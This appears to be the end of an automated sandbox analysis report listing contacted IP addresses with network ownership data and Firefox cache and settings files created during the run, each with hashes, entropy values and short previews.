                                                                                                                                                                                                    54.171.230.55
                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                    34.117.121.53
                                                                                                                                                                                                    		attachments.prod.remote-settings.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                    		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                    112.31.189.32
                                                                                                                                                                                                    		unknownChina
                                                                                                                                                                                                    		9808CMNET-GDGuangdongMobileCommunicationCoLtdCNtrue
                                                                                                                                                                                                    34.149.100.209
                                                                                                                                                                                                    		prod.remote-settings.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                    		2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                    34.160.144.191
                                                                                                                                                                                                    		prod.content-signature-chains.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                    		2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                    109.202.202.202
                                                                                                                                                                                                    		unknownSwitzerland
                                                                                                                                                                                                    		13030INIT7CHfalse
                                                                                                                                                                                                    34.107.243.93
                                                                                                                                                                                                    		push.services.mozilla.comUnited States
                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                    91.189.91.43
                                                                                                                                                                                                    		unknownUnited Kingdom
                                                                                                                                                                                                    		41231CANONICAL-ASGBfalse
                                                                                                                                                                                                    91.189.91.42
                                                                                                                                                                                                    		unknownUnited Kingdom
                                                                                                                                                                                                    		41231CANONICAL-ASGBfalse

                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                    IPs

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    Domains

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                    /home/saturnino/.cache/dconf/user

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                                                    MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                                                                                                                                                    SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                                                                                                                                                    SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                                                                                                                                                    SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:.

                                                                                                                                                                                                    /home/saturnino/.cache/mozilla/firefox/a3xevaya.default-release/cache2/entries/254256B27E0C48CF9B80B695F0B3B8CA84610495

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):15960
                                                                                                                                                                                                    Entropy (8bit):6.085307628984216
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:CNbdE/NbdE4AmwFMwFmHNbdE/NbdE4AmwFMwF+:CNbd8NbdNA7FtFyNbd8NbdNA7FtF+
                                                                                                                                                                                                    MD5:E3F92EDC8E2E13CBA60FD071A619EA6C
                                                                                                                                                                                                    SHA1:EBFB69F81EE921FE24848E39508C45BE56A1783E
                                                                                                                                                                                                    SHA-256:6910B7F4EB89C7170F0DB43952FA1DA01D22FCEBFC3F8EB9ED7806FC295F5FAB
                                                                                                                                                                                                    SHA-512:357A1EC80272A3789A69A82449CF97CE5336772DED7114B79DD269D7669D282EEE68AF6956AAB9F35D351086FAEA033C7D2C58701236C66A2CF96C13D2F0C9ED
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:{"permissions":{},"data":{"attachment":{"hash":"7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798","size":15829,"filename":"asrouter.ftl","location":"main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl","mimetype":"application/octet-stream"},"id":"cfr-v1-en-US","last_modified":1733178311775}}...Y./............gd2.G.Z.gd3w...q....:https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEANgFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAXxMIIF7TCCA9WgAwIBAgISBMJtMDN3uE5OHv5lykY1dGMeMA0GCSqGSIb3DQEBCwUAMIGSMQswCQYDVQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzEqMCgGA1UECgwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMSowKAYDVQQDDCFUaGUgVW5pdmVyc2UgU2VjdXJpdHkgQ29tcGFueSBMdGQwHhcNMjQxMjE4MTQ0NzUyWhcNMjUxMjE4MTQ0NzUyWjAmMSQwIgYDVQQDExtyZW1vdGUtc2V0dG

                                                                                                                                                                                                    /home/saturnino/.cache/mozilla/firefox/a3xevaya.default-release/cache2/entries/37373F56CBD822F5FCF64BA01E1320A0924D8460

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):23916
                                                                                                                                                                                                    Entropy (8bit):5.5900810772536165
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:BuPngEG1xNUIzFnieWrx0whbvru/j1iTaId3gCTHC3:BuPgEvIzFniew0wh/u/oa83gCTHC3
                                                                                                                                                                                                    MD5:C56B4261F10F343328908B765CC20EFA
                                                                                                                                                                                                    SHA1:CA9416DA3CD399DC7B2882FBBDFBA4807A3B9C90
                                                                                                                                                                                                    SHA-256:CC5F8DED3FB8D48BB4D19987BDFF8F692AA539C144DDA208A201656D1DB5B2C9
                                                                                                                                                                                                    SHA-512:93BE2BF1895440AEA10593B52F14A774B2B924A1CEDEA017177A19BC2F652A73EB61BE0228EBBFDD035B0F2B7BCC4B20161697585576A4072E34EF7B560FDA4F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:...i........gd2.gd2.G.Z.............:https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl.....# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/...## These messages are used as headings in the recommendation doorhanger..cfr-doorhanger-extension-heading = Recommended Extension.cfr-doorhanger-feature-heading = Recommended Feature..##..cfr-doorhanger-extension-sumo-link =. .tooltiptext = Why am I seeing this..cfr-doorhanger-extension-cancel-button = Not Now. .accesskey = N..cfr-doorhanger-extension-ok-button = Add Now. .accesskey = A..cfr-doorhanger-extension-manage-settings-button = Manage Recommendation Settings. .accesskey = M..cfr-doorhanger-extension-never-show-recommendation = Don.t Show Me This Recommendation. .accesskey = S..cfr-doorhanger-extension-learn-m

                                                                                                                                                                                                    /home/saturnino/.cache/mozilla/firefox/a3xevaya.default-release/cache2/entries/5FFD69415953BE9CE9C07B2E9C26DA959ADEA6CB

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):7590
                                                                                                                                                                                                    Entropy (8bit):6.070475901386771
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:MXjVQBvw/OfI08xHBEGRL2MJoMXMcABaSW1euN3AGQQMnfbaIVcwsGs3NMuI081L:MXjSwmQFxvLrjyBaVQfbaI8j3qRFOBLE
                                                                                                                                                                                                    MD5:B065E20039E6E39CB3395ED87110B2DA
                                                                                                                                                                                                    SHA1:940B13037A4EC760DFB5D0CA786137CD2CC81AF3
                                                                                                                                                                                                    SHA-256:FFE4E2F30E4BA4B44DC297B6BA9C9218B06007F6C8349126BA68F8EDE9F1CCCC
                                                                                                                                                                                                    SHA-512:FA156BB74363A25B4804871299DFAEC8FF2430D5CE561D8082EAF15EEF6DDD86C7634AE5C1D6661710C5D9B4E49D63417A69001E8F924BE5791039E21CBCE183
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:=..$z.........gd2.gd2.G.Z.gd2....{....:https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2021-09-19-15-17-11.chain.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEANgFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAWoMIIFpDCCA4ygAwIBAgISA2cc4z2KiRkwWTh5fC5vDgeeMA0GCSqGSIb3DQEBCwUAMIGSMQswCQYDVQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzEqMCgGA1UECgwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMSowKAYDVQQDDCFUaGUgVW5pdmVyc2UgU2VjdXJpdHkgQ29tcGFueSBMdGQwHhcNMjQxMjE4MTQ0NzQxWhcNMjUxMjE4MTQ0NzQxWjAuMSwwKgYDVQQDEyNjb250ZW50LXNpZ25hdHVyZS0yLmNkbi5tb3ppbGxhLm5ldDCCASAwDQYJKoZIhvcNAQEBBQADggENADCCAQgCggEBALTROAChpk1jJJt8tBs2/22cSFRAyo+MWYEs98t/7iVG7f2N0UICKqdxSx7eO77wgRgZU9oAQ5HHCXc7b5XxjSv9WJ/+fVexBJQFCNCGLy7EmvR7vvZnXCvnnQ1rZfVFw/RaZGotyL15XbSg5WFKaRPUPLOMrH4rQw+0Jk3AVYtVd/gX/cHSxlMU/e+6+eGFJBWCg8w/XyNdZUQlsKJhT4msjUDFDspaRAELmJ+5j8SvPGYRnT3sSi

                                                                                                                                                                                                    /home/saturnino/.cache/mozilla/firefox/a3xevaya.default-release/cache2/entries/BA0169DDECC481CDEEE92B48E23FCE9FD28E8595

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):15932
                                                                                                                                                                                                    Entropy (8bit):6.042298684687071
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:3A8V2GErRTZxvrAySqX1FW8jjt8+RZFPPRyiA8V2GErRTZxvrAySqX1FW8jjt8+7:wAVYTjrTbrRtLby5AVYTjrTbrRtLbyi
                                                                                                                                                                                                    MD5:78238EE150119A0B39D8832D4A75EE84
                                                                                                                                                                                                    SHA1:83F142AFC195FB89AE7B1D939598E495264BAC88
                                                                                                                                                                                                    SHA-256:35532CE29FA808D353F7DB096DBC33FDF9C59A026A0FD9864BFCE5512903ECC2
                                                                                                                                                                                                    SHA-512:2556A36EB7BD8974DE442BAE691D18422310451B8EE0821E5F0B3E42B1263BCEC607C9E13CC9206D87F38A8F4706C0FAF0B81C5978561A1AD4766871F3F11A12
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:r._J........gd2.gd2.G.Z.gd2.........a,~1734619649,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/deletion-request/1/4ee394c6-d4cd-43bd-8233-6c819b0e9770.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEANgFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQA5q//bDwriMfOZM54J7DJDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MTIxODE0NDc1M1oXDTI1MTIxODE0NDc1M1owgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC00TgAoaZNYySbfLQbNv9tnEhUQMqPjFmBLPfLf+4lRu39jdFCAiqncUse3ju+8IEYGVPaAEORxwl3O2+V8Y0r/Vif/n1XsQSUBQjQhi8uxJr0e772Z1wr550Na2X1RcP

                                                                                                                                                                                                    /home/saturnino/.cache/mozilla/firefox/a3xevaya.default-release/cache2/entries/D761C4E3CD44B794FCD52C88CEC268E12BE3D053

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):105
                                                                                                                                                                                                    Entropy (8bit):4.712462966622295
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:eSjB4C+eyRtbVXvX3XDkAsXLTgUQfzT+esX3u+llln:/BPtILXDFsHNQ33sHHl/n
                                                                                                                                                                                                    MD5:AC83F67FCF570A54286F57A021234ACC
                                                                                                                                                                                                    SHA1:874D993E2C36C022719374EA326565D458E7170F
                                                                                                                                                                                                    SHA-256:A579896A3B287878FCBC2A4E48AAEDD982C26CE471492A97E686832193B22445
                                                                                                                                                                                                    SHA-512:2630BED6A90B4AA2AF3FB5B798150C9D0F94746BFA01913B7067FCAB3428AD8A04A7960722C5D9C4B38153BA86C7868FA4999EA4B702BD6AC6371D42FE399504
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:.]..........gd2.gd2.G.Z.............~predictor-origin,:http://112.31.189.32:40158/.predictor::seen.1.....

                                                                                                                                                                                                    /home/saturnino/.cache/mozilla/firefox/a3xevaya.default-release/cache2/entries/F8CBD54DDA10F4286A41EC6A537240712D6C2308

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8508
                                                                                                                                                                                                    Entropy (8bit):6.093930554718803
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:6NpFNEKfVV3/y/NEKfVV3/y4NbZovSd6yd6D:6NpFNbdE/NbdE4A26O6D
                                                                                                                                                                                                    MD5:22875207084BF9BEF9E802736CE6B728
                                                                                                                                                                                                    SHA1:7DD5C33B6EE803291C80858F182E9797ABCA468C
                                                                                                                                                                                                    SHA-256:549092E6EDC02BC25723004571E036172DB2BECEF0E36CE37CD181883067FA8E
                                                                                                                                                                                                    SHA-512:6600C72253CAA592F6621483ED678133756ACDE76AC935AD633F9B66F616E49494C1C16A34A8E3E5ECEB7D8D793D4220A5500E8BD823997275296AE200F41D21
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:{"project_name":"Remote Settings PROD","project_version":"19.3.0","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"batch_max_requests":25,"readonly":true,"explicit_permissions":false},"capabilities":{"changes":{"description":"Track modifications of records in Kinto and store the collection timestamps into a specific bucket and collection.","url":"http://kinto.readthedocs.io/en/latest/tutorials/synchronisation.html#polling-for-remote-changes","version":"32.8.0","collections":["/buckets/blocklists","/buckets/blocklists-preview","/buckets/main","/buckets/main-preview","/buckets/security-state","/buckets/security-state-preview"]},"attachments":{"description":"Add file attachments to records","url":"https://github.com/Kinto/kinto-attachment/","version":"7.0.0","base_url":"https://firefox-settings-attachments.cdn.mozilla.net/"}}}..;..r........gd2.gd2.G.Z.gd3....2....:https://firefox.settin

                                                                                                                                                                                                    /home/saturnino/.cache/mozilla/firefox/a3xevaya.default-release/settings/main/ms-language-packs/asrouter.ftl.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):15829
                                                                                                                                                                                                    Entropy (8bit):4.8063055926523655
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:63/CCBmqCIKJumwOGmnOq6b4b9C4GoTlbo2ofF9/cFnSPhxtj3tCiwwau13151iS:OuPngEG1xNUIzFnieWrc
                                                                                                                                                                                                    MD5:96C542DEC016D9EC1ECC4DDDFCBAAC66
                                                                                                                                                                                                    SHA1:6199F7648BB744EFA58ACF7B96FEE85D938389E4
                                                                                                                                                                                                    SHA-256:7F32769D6BB4E875F58CEB9E2FBFDC9BD6B82397ECA7A4C5230B0786E68F1798
                                                                                                                                                                                                    SHA-512:CDA2F159C3565BC636E0523C893B293109DE2717142871B1EC78F335C12BAD96FC3F62BCF56A1A88ABDEED2AC3F3E5E9A008B45E24D713E13C23103ACC15E658
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/...## These messages are used as headings in the recommendation doorhanger..cfr-doorhanger-extension-heading = Recommended Extension.cfr-doorhanger-feature-heading = Recommended Feature..##..cfr-doorhanger-extension-sumo-link =. .tooltiptext = Why am I seeing this..cfr-doorhanger-extension-cancel-button = Not Now. .accesskey = N..cfr-doorhanger-extension-ok-button = Add Now. .accesskey = A..cfr-doorhanger-extension-manage-settings-button = Manage Recommendation Settings. .accesskey = M..cfr-doorhanger-extension-never-show-recommendation = Don.t Show Me This Recommendation. .accesskey = S..cfr-doorhanger-extension-learn-more-link = Learn more..# This string is used on a new line below the add-on name.# Variables:.# $name (String) - Add-on author name.cfr-doorhanger-extension-author =

                                                                                                                                                                                                    /home/saturnino/.cache/mozilla/firefox/a3xevaya.default-release/startupCache/scriptCache-child-new.bin

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:DIY-Thermocam raw data (Lepton 3.x), scale -21727--29407, spot sensor temperature 0.000000, unit celsius, color scheme 0, show spot sensor, calibration: offset 0.000000, slope 1097704644210083290633207808.000000
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):158354
                                                                                                                                                                                                    Entropy (8bit):5.132185260111892
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:kUfzWM4kPreu+cxlo3sRrWvyZG51ETwl5:RykPreu5lo3sx+/
                                                                                                                                                                                                    MD5:2EC85DD48D96DAE986A93B1FBB0B47AC
                                                                                                                                                                                                    SHA1:4FFB21931765D534C8B45C3672468A3AD4906F5A
                                                                                                                                                                                                    SHA-256:728CE6DF8FF02500613438933331B322DCC44B3A2110661ADD7C64635C099EAD
                                                                                                                                                                                                    SHA-512:E066A7E2AF8FE3CE867A4677DF6102FFEFCC67F819BFAF07529CB444AB9A99F5E56B034F3AD5470A8F40EBD767C436873914098AE808E7FB4AB785B7305A1CAB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:mozXDRcachev002.....*.chrome://global/content/process-content.js*.chrome://global/content/process-content.js....`....6.resource://gre/modules/extensionProcessScriptLoader.js6.resource://gre/modules/extensionProcessScriptLoader.js`...4....1.resource://gre/modules/ExtensionProcessScript.jsmF.jsloader/non-syntactic/resource/gre/modules/ExtensionProcessScript.jsm.....X...).resource://gre/modules/MessageChannel.jsm>.jsloader/non-syntactic/resource/gre/modules/MessageChannel.jsm0]..h....).resource://gre/modules/ExtensionUtils.jsm>.jsloader/non-syntactic/resource/gre/modules/ExtensionUtils.jsm.....?... .resource://gre/modules/Timer.jsm5.jsloader/non-syntactic/resource/gre/modules/Timer.jsmP'.......<.resource://gre/modules/URLQueryStrippingListProcessScript.js<.resource://gre/modules/URLQueryStrippingListProcessScript.jsL=..4....(.resource://gre/modules/addons/Content.js(.resource://gre/modules/addons/Content.js.C.......'.chrome://browser/content/tab-content.js'.chrome://browser/content/tab-co

                                                                                                                                                                                                    /home/saturnino/.cache/mozilla/firefox/a3xevaya.default-release/startupCache/scriptCache-new.bin

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8360185
                                                                                                                                                                                                    Entropy (8bit):5.197650212157503
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:49152:UZLE60+XWaplFYgW0+NI2tidKxgNbcuApK9llF3zyQFWjbVPU1Hd63p3sem7x:be/p2tidKxgNbcuApKf3rabz3S
                                                                                                                                                                                                    MD5:A125680D198D8CE4C7808BDCE9DDFB78
                                                                                                                                                                                                    SHA1:848C33535B8AD67B69F84FFA85282B9E4CF36403
                                                                                                                                                                                                    SHA-256:C0A3B01906921B9DF0E1AF02065738B553C0769650D21862DB5294290BBCF546
                                                                                                                                                                                                    SHA-512:76E319F8E171712FC9E413E0A426441DE38F7DD9BB7DBAE17BC2A4B8F25C60970AB09B9BD12EC512E768AE1F9F432B8387DD370487618F56719387CBEC5F8D81
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:mozXDRcachev002..../.resource://gre/modules/MainProcessSingleton.jsmD.jsloader/non-syntactic/resource/gre/modules/MainProcessSingleton.jsm.........#.resource://gre/modules/Services.jsm8.jsloader/non-syntactic/resource/gre/modules/Services.jsm....d....1.resource://gre/modules/CustomElementsListener.jsmF.jsloader/non-syntactic/resource/gre/modules/CustomElementsListener.jsmh...L....#.resource:///modules/BrowserGlue.jsm;.jsloader/non-syntactic/resource/app/modules/BrowserGlue.jsm.........%.resource://gre/modules/XPCOMUtils.jsm:.jsloader/non-syntactic/resource/gre/modules/XPCOMUtils.jsmP...TU...'.resource://gre/modules/AppConstants.jsm<.jsloader/non-syntactic/resource/gre/modules/AppConstants.jsm.#.......-.resource://gre/modules/ActorManagerParent.jsmB.jsloader/non-syntactic/resource/gre/modules/ActorManagerParent.jsm08..0O...-.resource://gre/modules/EnterprisePolicies.jsmB.jsloader/non-syntactic/resource/gre/modules/EnterprisePolicies.jsm`........3.resource://gre/modules/EnterprisePolici

                                                                                                                                                                                                    /home/saturnino/.cache/mozilla/firefox/a3xevaya.default-release/startupCache/urlCache-new.bin

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2359
                                                                                                                                                                                                    Entropy (8bit):4.723197587308875
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:0oixAl2dXUGttISt3bqJtgtkt0IbFr9cHSWpVcaXBsneJrQc:76Al2dXUIIq3bAcwfWseJr3
                                                                                                                                                                                                    MD5:BBAFA4904B8EC4404105FD232E2D6BF3
                                                                                                                                                                                                    SHA1:764DC7BFD554F82C05EF43E9A8765B9CC2764A34
                                                                                                                                                                                                    SHA-256:08A0ADC928EB4C2B45C17203EA50A866128E2ACF4060A84CD6E7D301B3BBFFBD
                                                                                                                                                                                                    SHA-512:98EBCE5C1FBF9A25E1B5EED4284D2BE8948A02C4708995F81D3EC4C19E0974A1E83F4BDFF2A53C5F4129170D2C8A1327A3B62725D3449E55A6EE893A40202960
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:mozURLcachev002.#....+./usr/lib/firefox/distribution/policies.json.3.chrome/browser/content/browser/built_in_addons.json.O./home/saturnino/.mozilla/firefox/a3xevaya.default-release/addonStartup.json.lz4.0.chrome/en-US/locale/en-US/global/intl.properties.../usr/lib/firefox/distribution/distribution.ini.7.chrome/en-US/locale/en-US/global/aboutReader.properties.%.chrome/toolkit/content/global/xul.css...chrome/toolkit/skin/classic/global/tooltip.css...res/contenteditable.css.$.chrome/toolkit/res/counterstyles.css...res/designmode.css...chrome/toolkit/res/forms.css...chrome/toolkit/res/html.css...chrome/toolkit/res/mathml.css.-.chrome/toolkit/content/global/minimal-xul.css...chrome/toolkit/res/noframes.css...chrome/toolkit/res/noscript.css...chrome/toolkit/res/quirk.css.1.chrome/toolkit/skin/classic/global/scrollbars.css...res/svg.css...chrome/toolkit/res/ua.css.G./home/saturnino/.mozilla/firefox/a3xevaya.default-release/xulstore.json.%.localization/en-US/branding/brand.ftl.2.localization/e

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/addonStartup.json.lz4.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:Mozilla lz4 compressed data, originally 17369 bytes
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4333
                                                                                                                                                                                                    Entropy (8bit):6.569599251443781
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:53l9XdC6YpFg9NlS/D22p/ZrZd7ze1pxjjZBvuJ+6FV5w1xzm/n:5ftuM9K/DrZd7q/qBXoa
                                                                                                                                                                                                    MD5:0E921AC493B812E8513C1F743D0F4021
                                                                                                                                                                                                    SHA1:F87F3CE7DDC50842C9E868AA5448CCFC5A2522F3
                                                                                                                                                                                                    SHA-256:23FADD9E1C688A7A56C9CE8D2505B9561B7708B7F97D4485016A1B69711CE857
                                                                                                                                                                                                    SHA-512:EE699CF8B8553DDFDDBD473981B71FA8B2B4FA016A4675620A791896C3C3DDE4896E945CA512BC0D6435241642B195F53B04DD35970A5DFB2D9706FCF8A1D98D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:mozLz40..C....{"app-system-addons":{"....reset-search-defaults@mozilla.com/..Gdependencies":[],"enabled":true,"lastModifiedTime":1629470033402,"loader":null,"path":|.....xpi","rootURI":"jar:file:///home/saturnino/...../firefox/a3xevaya....-release/fe5...es/%7Bb2669443-b5ea-44d6-8105-fcece6050402%7D/'..... !/...unInSafeMode ..signedState":3...D...162764250...,"telemetryKey$..3%40.......:2.1.0","version":"..#},......tection..;/11....g..~...8..6....o.......&.8512593....{.....Y1.0.1......startupData...p..astentL..!er...webRequest%..onBefore...[[{"incognito..UtabId..!yp...."main_frame"],"url...."https://www.google.../\.9*",!...amazon.de/exec/obidos/external3../6.ObingU..@duck..!go!..:..ebay.ch/sV...en.wikipedia.org/.../Special:S...*..dwindow....},["blocking"]]]}..`,"stag..%{}.....0.{....}............`.....doh-rollout..1org.....#a147618.......r......uusr/lib..vbrowser...U.......u.....l..V..{.}org:2.0b.....{.....formautofilld.T.s...e.+.V...f.(.W..g...........g..picturein...k.T.n..w...o.+.Z...

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/broadcast-listeners.json.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):216
                                                                                                                                                                                                    Entropy (8bit):4.755039128811985
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:YWLSf85jcM2MAfeKSyikXMDuQ6s/WoMmgjwHbSRmnPE2cb:YWLSf6gMAfzSy7MDNFMmqmpncBb
                                                                                                                                                                                                    MD5:3F4783C4A6E2C30C125D1A3E464B8381
                                                                                                                                                                                                    SHA1:E0341861A8E1E7A780AD941DBF2887C5C1DF734A
                                                                                                                                                                                                    SHA-256:DE1D02EC9612920EF8E6FC72D437259756D96CFB2FC6973EF69B29E3EA04C769
